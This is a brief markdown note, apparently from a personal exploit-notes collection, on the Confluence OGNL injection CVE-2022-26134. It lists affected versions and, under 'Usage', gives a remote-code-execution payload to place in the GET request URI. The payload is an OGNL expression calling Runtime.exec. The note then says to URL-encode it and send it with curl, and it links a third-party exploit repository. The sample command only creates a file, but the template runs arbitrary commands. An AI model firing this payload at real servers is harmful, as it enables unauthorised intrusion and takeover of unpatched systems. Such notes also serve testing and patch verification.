# CVE-2022-26134

* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
* Confluence versions:
    * 1.3.0 to 7.4.17
    * 7.13.0 to 7.13.7
    * 7.14.0 to 7.14.3 
    * 7.15.0 to 7.15.2 
    * 7.16.0 to 7.16.4
    * 7.17.0 to 7.17.4
    * 7.18.0 to 7.18.1 
* Object Graph Navigation Language (OGNL)

## Usage

* Payload is a GET request which is set via the URI
```sh
 ${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/
```
* URL encode and curl for PoC

* Use [Naqwda's exploit](https://github.com/Nwqda/CVE-2022-26134.git)